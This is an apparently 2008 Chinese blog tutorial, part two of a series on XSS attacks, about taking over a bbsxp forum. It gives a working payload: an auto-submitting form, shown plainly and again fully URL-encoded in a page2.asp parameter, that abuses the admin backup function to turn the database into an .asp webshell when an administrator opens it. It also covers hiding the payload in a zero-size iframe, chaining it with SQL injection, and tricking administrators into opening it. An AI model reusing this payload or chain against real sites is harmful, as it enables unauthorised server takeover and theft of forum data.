导航

最新的黑客技术:详解XSS跨站脚本攻击 (二)

Posted on 2008-05-05 18:28  菜鸟都不容易  阅读(174)  评论(0编辑  收藏  举报
 三、来自外部的跨站攻击

  有的时候,当我们对于目标程序找不到可以利用的跨站点,这个时候我们可以利用可以从外部入手,利用我们要拿下的是它的论谈,论谈的安全性做的很好,但其留言板却存在跨站漏洞,这个时候我们可以在留言板里写入跨站语句,跨站语句为以表单的方式向论谈提交提升权限的语句,如上面的bbsxp加asp 扩展的语句。当然我们可利用后台的备份功能直接得到一个shell。

  例:先上传一个文件linzi.txt,内容如下:

<body onload="javascript:document.forms[0].submit()"><form
action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"><input value="database/bbsxp.mdb" name="yl" ><input value="database/shit.asp" name="bf" ></body></html>

  上面的代码是把论谈的数据库备份为shit.asp,留言板存在跨站点如下:

网络安全应用必知技巧
·窃取QQ方法 ·病毒查杀 ·RSS安全 ·ZoneAlarm ·网络钓鱼
·木马清除 ·黑客攻击 ·卡巴斯基 ·入侵检测 ·恶意代码
·黑软应用 ·加解密技巧 ·网页炸弹 ·黑客入侵 ·黑客技术
·QQ安全 ·洪水攻击 ·反黑技谋 ·软件破解 ·网管工具
·脚本攻防 ·清除蠕虫 ·中毒自救法 ·DDoS攻防 ·端口详析
  http://127.0.0.1/bbsxp/page2.asp?username=

  我们构造备份跨站语句如下:

http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%66%6F%72%6D%73%5B%30%5D%2E%73%75%62%6D%69%74%28%29%22%3E%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%62%62%73%78%70%2F%61%64%6D%69%6E%5F%66%73%6F%2E%61%73%70%3F%6D%65%6E%75%3D%62%61%6B%62%66%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%62%62%73%78%70%2E%6D%64%62%22%20%6E%61%6D%65%3D%22%79%6C%22%20%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%73%68%69%74%2E%61%73%70%22%20%6E%61%6D%65%3D%22%62%66%22%20%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E

  或者构造跨站语句,利用iframe打开一个0大小的linzi.txt。

  当管理员打开后,会自动备份得到一个shell.

  四、XSS与其它技术的结何

  从上面的实例,我们可以知道,如何欺骗管理打开是一个很重要的步骤,对于欺骗打开,除了社会工程学外,我们可以结合其它的技术,如sql injection.当我们渗透一个网站之时,主站mssql注入漏洞,权限为public,这个时候我们利用update构造跨站语句,如用iframe打开一个上面的备份得到shell的跨站语句等,同样,我们可以在社会工程学时,利用QQ的其它跨站漏洞等等。

  总是对于欺骗也是一门艺术,具体怎么利用,大家就发挥自己的想象力吧!

  五、Flash木马的制作

  略